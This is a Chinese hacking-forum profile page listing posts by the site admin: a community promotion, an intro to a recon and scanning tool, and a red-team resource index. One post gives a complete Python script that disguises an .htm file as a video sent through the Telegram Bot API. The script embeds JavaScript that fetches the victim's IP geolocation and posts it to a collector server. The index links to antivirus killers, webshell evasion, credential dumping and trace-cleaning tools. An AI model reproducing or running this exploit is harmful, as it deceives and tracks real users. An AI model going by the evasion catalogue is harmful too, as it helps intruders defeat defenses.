跳转到帖子

ISHACK

超级管理员
  • 注册日期

  • 上次访问

ISHACK 发布的所有帖子

  1. Ishack 黑客社区详细介绍 Ishack 是一个专注于技术探索、编程、黑客文化和网络安全的全球性社区,旨在为技术爱好者、黑客、开发者、安全研究员等提供一个开放、包容和富有创造力的交流平台。无论你是一个刚刚开始接触黑客技术的初学者,还是一个经验丰富的资深黑客,Ishack 都能为你提供成长和展示的机会,帮助你在技术的道路上不断前行。 社区目标与愿景 Ishack 的核心目标是打造一个充满技术氛围、注重实用技能和技术深度的社区。在这里,我们不仅鼓励成员们分享和讨论前沿技术,还致力于推动网络安全、隐私保护、开源精神以及黑客文化的健康发展。我们希望 Ishack 能够成为一个技术交流的桥梁,连接来自不同背景的成员,推动技术创新和协作。 社区内容与板块 Ishack 的内容涵盖了广泛的技术领域,特别是与网络安全、黑客技术相关的知识。我们为会员提供了多种专门的讨论板块,包括: 1. 网络安全 • 渗透测试:包括常见的渗透测试工具和技巧,如Kali Linux、Metasploit、Nmap等,以及如何进行红队攻防对抗。 • 漏洞研究与修复:介绍各种漏洞的发现、分析及漏洞修复的技巧。成员们分享各类漏洞报告、漏洞挖掘技术,以及如何有效地修补漏洞。 • 恶意软件分析:讨论病毒、木马、勒索软件的分析与防护,包括逆向工程、沙箱分析等技术。 2. 逆向工程 • 分享与软件逆向、破解程序、解密加密算法、硬件破解等相关的知识与案例。成员们可以交流逆向分析工具的使用技巧,如IDA Pro、Ghidra等。 3. 加密与解密 • 专注于各类加密算法、密码破解技术、数字签名、区块链技术等。包括对传统对称加密、非对称加密、哈希函数等的分析和应用。 4. 社会工程学 • 讨论如何通过心理操控、社会工程攻击等手段,突破防线或获得敏感信息。涉及社交媒体、电话诈骗、钓鱼攻击等领域的技巧和防范。 5. CTF 挑战 • 定期组织 Capture The Flag(CTF)竞赛,模拟真实网络安全攻击与防御场景,考验并提升社区成员的技术水平。CTF 是一个黑客社区的重要组成部分,通过挑战,成员可以更深入地理解渗透测试、漏洞利用、加密解密等技术。 6. 开源项目与工具 • Ishack 提倡开源精神,社区内有丰富的开源项目分享,供成员学习和贡献。包括安全工具、脚本、框架等,任何成员都可以参与其中,提出改进建议或贡献代码。 7. 技术分享与教程 • 社区成员定期举办技术讲座、分享会以及线上培训,帮助其他成员提升技能。教程内容涵盖从基础到高级的各类主题,比如编程语言、操作系统安全、数据库安全等。 社区活动与互动 Ishack 鼓励社区成员积极参与到各种活动中来,不仅限于技术讨论,我们还定期举办多种线上和线下活动,进一步增进社区的互动性和凝聚力。活动包括: • 技术分享会:邀请业内专家、技术大牛分享最新的技术趋势、工具、实践经验。 • 线上挑战赛:定期举行渗透测试竞赛、破解竞赛等技术性挑战,提供实战经验的积累。 • 黑客文化交流:举办黑客文化、历史、伦理等方面的讨论,探讨黑客精神的传承与发展。 • 跨平台合作:鼓励不同领域的开发者、安全研究员、黑客等在技术项目上进行合作,推出跨平台的技术解决方案。 社区成员的成长与交流 Ishack 是一个注重技术深度和创新精神的社区,我们希望每个成员都能在这里得到成长,无论是在技能上,还是在思维方式上。我们鼓励成员们分享自己的项目成果和技术探索,互相学习、互相帮助。社区内有大量的资源可供学习,包括: • 视频教程:从入门到进阶,涵盖各类技术主题。 • 文章与博客:成员分享自己的经验、技巧、工具、漏洞分析等。 • Q&A 互动:提问与解答专区,解决大家在技术学习中的疑惑。 加入 Ishack,成就更好的自己 Ishack 旨在为全球的技术探索者提供一个自由、平等、开放的平台,帮助每一个有技术追求的人实现自己的梦想。加入 Ishack,你将获得: • 与全球顶尖黑客和技术专家的交流机会。 • 各类网络安全技术的实践和挑战平台。 • 丰富的学习资源,提升你的技能和知识水平。 • 参与到真实项目和技术开发的机会,开创更多的技术可能。 无论你是一个热衷于技术研究的黑客,还是一名对网络安全有浓厚兴趣的学生,Ishack 都是你发挥创意、结识志同道合伙伴、提升自己技术能力的理想平台。让我们一起探索技术的无尽边界,推动黑客文化与网络安全的未来发展!
  2. 本文研究了一种与 CVE-2024-7014 漏洞类似的情况。一个带有“.htm”扩展名的文件被伪装成视频并通过 Telegram API 发送,当用户期望看到视频时,实际上执行的是 HTML 中的 JavaScript 代码。 技术细节Evilloader 是一种加载程序,允许攻击者在目标系统上下载并运行其他恶意负载。CVE-2024-7014 描述了此模块的反分析机制的更新。在这种情况下,虚假视频会将受害者引导至恶意软件(虚假播放保护)下载页面,然后还会发送 IP 记录器。 漏洞详细信息该漏洞主要原因是Telegram服务器响应中的“.htm”文件格式被误认为是视频。“.htm”代码片段在浏览器中以“content://”打开。即: content://org.telegram.messenger.provider/media/Android/data/org.telegram.messenger/files/Telegram/Telegram%20Video/4_5924894289476721732.htm 打开内容,从而允许触发并打开指定的HTML页面。 场景(IP 记录器)受害者可能会尝试使用视频播放器打开此文件,如果失败(因为它不是实际的视频格式),它会重定向到默认浏览器,或者如果它被理解为“HTML 文件”,则可以双击在浏览器中打开。这允许恶意 JavaScript 运行。 如果受害者从 Telegram 下载该文件时以为它是一个视频,浏览器实际上会运行 HTML 内容,并且 IP 信息会发送到攻击者的服务器。 转换文件import requests BOT_TOKEN = "your_bot_token" CHAT_ID = "your_chat_id" html_content = """ <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script> fetch('http://ip-api.com/json') .then(response => response.json()) .then(data => { fetch('http://192.168.137.1:5000/log_ip', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ ip: data.query, country: data.country, region: data.regionName, city: data.city, isp: data.isp }) }); }) .catch(error => console.error('Error fetching IP:', error)); </script> </head> <body> </body> </html> """ html_path = "testv.mp4" with open(html_path, "w") as file: file.write(html_content) files = { "video": ( "a.htm", open(html_path, "rb"), "video/mp4" ) } url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendVideo" data = {"chat_id": CHAT_ID, "supports_streaming": False} response = requests.post(url, data=data, files=files) if response.status_code == 200: print("message send") else: print(f"error: {response.text}") 在此代码中,.htm 文件以“视频”的形式呈现并通过 Telegram API 发送。在 Android 设备上,当用户尝试打开此文件时,它实际上会运行包含 JavaScript 的 HTML 页面。 下面的视频展示了“恶意软件和 IP 记录器”场景是如何进行的: telegramexploitvideo.mp4
  3. 功能介绍密探-主要包含资产信息收集,IP端口查询,备案信息查询,子域名爆破(支持多级递归),搜索引擎语法自动生成(FOFA,Hunter,Quake,ZoomEye,google,github),资产测绘(FOFA,hunter,Quake,ZoomEye 的查询及结果导出),指纹识别、敏感信息(暴露接口并可以自动探测未授权),文件扫描(包含目录,备份文件,spring信息泄漏,自定义字典等)、渗透技能路线备忘录,常用网络安全网站导航等功能。 本工具仅供安全测试人员运用于授权测试, 禁止用于未授权测试, 违者责任自负。作者不对您使用该工具所产生的任何后果负任何法律责任。 本工具在扫描模块使用多线程,在测试过程中根据目标的实际情况进行调整,切勿进行大线程低延时的大规模快速扫描,以免对目标服务造成不利影响。 官方地址kkbo8005/mitan: 密探渗透测试工具 (github.com) 下载地址密探1.16版本在线下载地址:mitan1.16.zip_免费高速下载|百度网盘-分享无限制 (baidu.com) 运行方式在jdk8环境下运行以下语句运行: Source code☀ 1 lineSelect All java -jar mitan-jar-with-dependencies.jar 若不想输入这么长太长语句,可以通过以下脚本的方式启动: Mac/Linux 环境下,可以通过sh文件启动,需要在控制台窗口先给予start.sh权限。 Source code☀ 1 lineSelect All chmod +x start.sh 赋予权限后,每次在控制台窗口执行如下命令打开工具 Source code☀ 1 lineSelect All ./start.sh windows系统直接双击"start.bat" 文件启动工具 窗口预览基础功能 资产测绘 敏感信息(接口未授权) 备份扫描 目录扫描 渗透备忘 网站导航网站导航相对来说站点是比较多的,也是平时做渗透测试所用的到的站点。 功能实测对本站点域名进行了功能实测,效果如下,虽然有部分内容无法获取,但是信息已经够用了。 常见问题(1)运行时错误提示: 缺少 JavaFX 运行时组件的解决方法。JavaFX 从 Java 11 开始从 JDK中移除,JDK11以上的需要单独下载和配置javaFx。 1. 下载 JavaFX SDK首先,从 Gluon 网站 下载对应操作系统的 JavaFX SDK。 2. 解压到目录将下载的 JavaFX SDK 解压到一个目录中(例如 C:\javafx-sdk-21)。 3. 运行 JAR 文件时指定 JavaFX 模块路径在运行你的 JAR 文件时,需要指定 JavaFX 模块的路径。假设你的 JavaFX SDK 解压在 C:\javafx-sdk-21,你可以使用以下命令来运行你的 JAR 文件: Source code☀ 1 lineSelect All java --module-path "C:\javafx-sdk-21\lib" --add-modules javafx.controls,javafx.fxml -jar mitan-jar-with-dependencies.jar 在这个命令中: --module-path "C:\javafx-sdk-21\lib" 指定了 JavaFX 模块的路径。 --add-modules javafx.controls,javafx.fxml 添加了所需的 JavaFX 模块,根据你的应用程序可能需要添加其他模块。感谢 p1at0x ,s0nd9r师傅在Issues中提出的解决方案,可自行根据操作系统修改start.bat或start.sh脚本文件,解决快速启动。 (2) 若遇到界面乱码问题,建议指定编码方式进行启动。Source code☀ 1 lineSelect All java "-Dfile.encoding=UTF-8" -jar mitan-jar-with-dependencies.jar 可自行根据操作系统修改start.bat或start.sh脚本文件,解决快速启动。 3) 关于ZoomEye查询提示“request invalid, validate usage and try again” 的解决方法出现上述提示,是因为ZoomEye 注册用户的API查询权益分不够(个人版会员以上不会出现此问题), 具体会员权益点击https://www.zoomeye.org/pricing 查看即可,想获取权益积分,可以关注ZoomEye公众号或加入官方社群。
  4. 目录0x00 技能栈 0x01 漏洞理解篇(Vulnerability) 1.1 前端 1.2 后端 1.3 打造自己的知识库 0x02 漏洞利用篇(Exploit) 2.1 前端安全-XSS 2.2 前端安全-CSRF 2.9 Server-side request forgery (SSRF) 2.4 [注入]SQL注入&数据库漏洞利用 2.5 [注入]模板注入 Server Side Template Injection (SSTI) 2.6 [注入]命令注入&代码执行 2.7 [注入]Xpath注入 2.8 XML External Entity (XXE) 2.9 文件操作漏洞 2.10 反序列化漏洞 2.11 包含漏洞 2.12 Java-特性漏洞 2.13 NodeJs-特性漏洞 2.14 不一致性 0x03 代码审计篇(Audit) 3.1 PHP 3.2 JAVA 3.3 .NET 3.4 Perl CGI 0x04 渗透篇(Penetration) 4.1 网络预置 4.1.1 代理客户端(环境准备) 4.1.2 常规信息(单兵) 4.1.3 资产搜索引擎(大数据) 4.1.4 移动端信息收集 4.1.5 近源渗透(WiFi) 4.2 网络接入(exp) 4.2.1 漏洞验证(扫描器) 4.2.1.1 主动式 4.2.1.2 被动式 4.2.2漏洞利用(1day) 4.2.2.1 漏洞利用知识 4.2.2.2 漏洞利用工具 4.2.2.3 dnslog平台 4.2.3 字典 4.3 权限获取&提升 4.3.1 Win 4.3.2 Linux 4.3.3 Docker&Sandbox逃逸 4.4 权限维持&后门 4.4.1 通用 4.4.2 Shell会话 4.4.2 Webshell 4.4.3 PC & Server 4.4.4 Mobile (Android & ios) 4.5 免杀 4.5.1 二进制免杀 4.5.2 webshell免杀和WAF逃逸 4.6 隧道&代理 4.6.1 TCP隧道 4.6.2 HTTP隧道 4.6.3 DNS隧道 4.6.3 ICMP隧道 4.7 后渗透 4.7.1 内网信息获取&执行 4.7.2 轻量级扫描工具 4.7.3 渗透框架 4.7.4 域渗透 4.7.5 云平台 4.8 反溯源 4.9 协同 0x00 技能栈依照红队的流程分工,选择适合自己的技能栈发展。 0x01 漏洞理解篇(Vulnerability)1.1 前端 跨域安全 1.2 后端 错综复杂的后端逻辑及安全 1.3 打造自己的知识库 [Tool] 推送安全情报爬虫@Le0nsec 0x02 漏洞利用篇(Exploit)2.1 前端安全-XSS Cross Site Scripting (XSS) 2.2 前端安全-CSRF Client-side request forgery (CSRF) 2.9 Server-side request forgery (SSRF)SSRF 2.4 [注入]SQL注入&数据库漏洞利用SQL injection - MySQL SQL injection - Oracle SQL injection - MSSQL SQL injection - 信息外带(OOB) Redis 漏洞利用 [Tool] 数据库综合利用工具 [Tool] 数据库综合利用工具 [Tool] MSSQL利用工具 2.5 [注入]模板注入 Server Side Template Injection (SSTI) STTI 总述 SSTI -Python SSTI -PHP SSTI Payload @payloadbox 2.6 [注入]命令注入&代码执行命令注入&代码执行-PHP 命令注入&代码执行-Java 2.7 [注入]Xpath注入 XPath Injection 2.8 XML External Entity (XXE)XXE 2.9 文件操作漏洞文件上传漏洞 文件上传漏洞WAF绕过-JSP FCKeditor编辑器漏洞利用 2.10 反序列化漏洞 反序列化漏洞-PHP 反序列化漏洞-Java 绕过高版本Jdk的限制进行Jndi注入利用 [Tool] 反序列化漏洞利用工具-Java ysoserial [Tool] 反序列化漏洞利用工具 针对Java ysoserial进行拓展 2.11 包含漏洞包含漏洞-PHP 2.12 Java-特性漏洞表达式(EL)注入 Spring表达式(SPEL)注入 OGNL表达式注入 SprintBoot漏洞利用清单@LandGrey [Tool] SprintBoot漏洞利用工具 2.13 NodeJs-特性漏洞Node.js 原型链污染 2.14 不一致性 DNS rebinding 攻击 请求走私总结@chenjj 0x03 代码审计篇(Audit)3.1 PHP Java代码审计手册 PHP代码审计@bowu678 PHP代码审计入门指南@burpheart 3.2 JAVA Java代码审计手册 Java代码审计@cn-panda Java安全@Y4tacker Java漏洞平台@j3ers3 3.3 .NET.Net反序列化@Ivan1ee 3.4 Perl CGI Perl基础&代码审计@mi1k7ea 0x04 渗透篇(Penetration)【流程】网络预置(准备&信息收集)-->网络接入(外网突破)-->权限获取和提升-->权限维持(后门)-->后渗透 【基础】---免杀+++反溯源+++协同--- 4.1 网络预置4.1.1 代理客户端(环境准备) 全局代理[VMware]:Openwrt on VMware网关方案 全局代理[Win]:Windows下socks客户端全局代理终极解决方案——tun2socks [Tool] Windows下全局代理客户端工具 SSTap [Tool] Windows下全局代理客户端工具 Clash for Windows [Tool] Windows下代理客户端工具 Proxifier [Tool] Windows版 proxychains 4.1.2 常规信息(单兵)外网信息收集思路 IP地址信息网站 ipip.net IP反查域名和子域名查询 rapiddns.io 子域名查询 dnsdumpster 4.1.3 资产搜索引擎(大数据)fofa.so shodan.io zoomeye.org censys.io 4.1.4 移动端信息收集 [Tool] 移动端信息收集工具 AppInfoScanner [Tool] 安全分析框架 MobSF 4.1.5 近源渗透(WiFi) 打造近源渗透工具 4.2 网络接入(exp)4.2.1 漏洞验证(扫描器) 4.2.1.1 主动式[Tool] AWVS Docker版 [Tool] 长亭的扫描器 Xray [Tool] Vulmap [Tool] 红队综合渗透框架SatanSword@Lucifer1993 4.2.1.2 被动式 [Tool] BurpSutie 插件集合@Mr-xn 4.2.2漏洞利用(1day)4.2.2.1 漏洞利用知识漏洞索引表【待整理】 漏洞利用wiki 红队中易被攻击的一些重点系统漏洞整理@r0eXpeR 织梦全版本漏洞扫描@lengjibo 4.2.2.2 漏洞利用工具 [Tool] 国内OA系统漏洞检测 [Tool] Struts2漏洞扫描&利用 [Tool] Struts2漏洞扫描&利用 [Tool] shiro反序列化漏洞利用 [Tool] shiro反序列化漏洞利用 [Tool] Fastjson漏洞快速利用框架 Fastjson姿势技巧集合@safe6Sec [Tool] EBurstGo Exchange 服务器 Web 接口爆破邮箱账户 [Tool] ConfluenceMemshell Confluence利用工具(CVE-2021-26084,CVE-2022-26134,CVE_2023_22515,CVE-2023-22527) 4.2.2.3 dnslog平台 dnslog.cn ceye requestrepo 4.2.3 字典常用的字典,用于渗透测试、SRC漏洞挖掘、爆破、Fuzzing等@insightglacier Fuzzing相关字典@TheKingOfDuck 爆破字典 4.3 权限获取&提升4.3.1 Win权限获取: Windows 认证凭证获取 [Tool] mimikatz Windows认证凭证提取神器 [Tool] go-secdump 利用smb远程无文件落地获取@jfjallid 提权: Windows提权检测工具 Windows Exploit Suggester Windows提权漏洞集合@SecWiki PetitPotato for Win10 CVE-2022-24481 4.3.2 Linux权限获取: Linux 认证凭证获取 提权: Linux 提权检测脚本 lse.sh Linux setuid提权 Linux提权漏洞集合@SecWiki 4.3.3 Docker&Sandbox逃逸Dokcer容器逃逸@duowen1 4.4 权限维持&后门4.4.1 通用 Meterpreter of Metasploit 使用教程 4.4.2 Shell会话反弹/正向 Shell & 升级交互式Shell (Linux&Win) [Tool] reverse-shell 4.4.2 Webshell[Tool] WebShell管理工具 菜刀 [Tool] WebShell管理工具 蚁剑 [Tool] WebShell管理工具 冰蝎 [Tool] WebShell管理工具 哥斯拉 收集的各种Webshell@tennc Webshell 命令执行失败问题解决 4.4.3 PC & Server[Tool] Cobalt Strike Cobalt Strike资料汇总@zer0yu 4.4.4 Mobile (Android & ios)4.5 免杀4.5.1 二进制免杀免杀系列文章及配套工具@TideSec shellcode加载器[Tool] LoaderGo免杀工具@di0xide-U [Tool] 千机-红队免杀木马自动生成器@Pizz33 [Tool] RingQ@T4y1oR [Tool] darkPulse@fdx-xdf kill杀软[Tool] 强关进程EDR-XDR-AV-Killer@EvilBytecode [Tool] 强关Windows defender@es3n1n rootkit[Tool] shadow-rs@joaoviictorti 4.5.2 webshell免杀和WAF逃逸Webshell免杀&WAF逃逸 [Tool] 哥斯拉WebShell免杀生成@Tas9er [Tool] 冰蝎WebShell免杀生成@Tas9er [Tool] 免杀webshell生成集合工具@cseroad [Tool] XG拟态-Webshell静态免杀+流量逃逸@xiaogang000 [Tool] 哥斯拉二次开发-WAF逃逸+免杀@kong030813 4.6 隧道&代理4.6.1 TCP隧道SSH 端口转发&开socks5 Iptables 端口复用 [Tool] 反向端口转发工具 FRP [Tool] 内网多级代理服务端工具 Venom [Tool] 内网多级代理服务端工具 Stowaway 4.6.2 HTTP隧道 [Tool] HTTP代理 Neo-reGeorg [Tool] HTTP代理 suo5 4.6.3 DNS隧道[Tool] DNS隧道工具 iodine 4.6.3 ICMP隧道[Tool] ICMP隧道工具 PingTunnel 4.7 后渗透4.7.1 内网信息获取&执行 Windows 主机常用命令 [Tool] Impacket [Tool] 流量取证工具 BruteShark [Tool] 浏览器数据导出解密工具 [Tool] SharpRDPLog [Tool] SharpXDecrypt 4.7.2 轻量级扫描工具 [Tool] fscan [Tool] Landon 4.7.3 渗透框架[Tool] 后渗透利用神器 Metasploit [Tool] 内网横向拓展系统 InScan [Tool] 开源图形化内网渗透工具 Viper 4.7.4 域渗透域渗透@uknowsec 域提权:MS14-068,CVE-2020-1472(Zerologon),CVE-2021-42287/CVE-2021-42278,CVE-2022-26923 4.7.5 云平台 从零开始的Kubernetes攻防@neargle [Tool] Aliyun Accesskey Tool [Tool] CF 云环境利用框架 4.8 反溯源Linux 痕迹清理 攻击和反制@Getshell 4.9 协同HackMD markdown协同工具(Docker版) 文件管理系统 Othertoc目录生成工具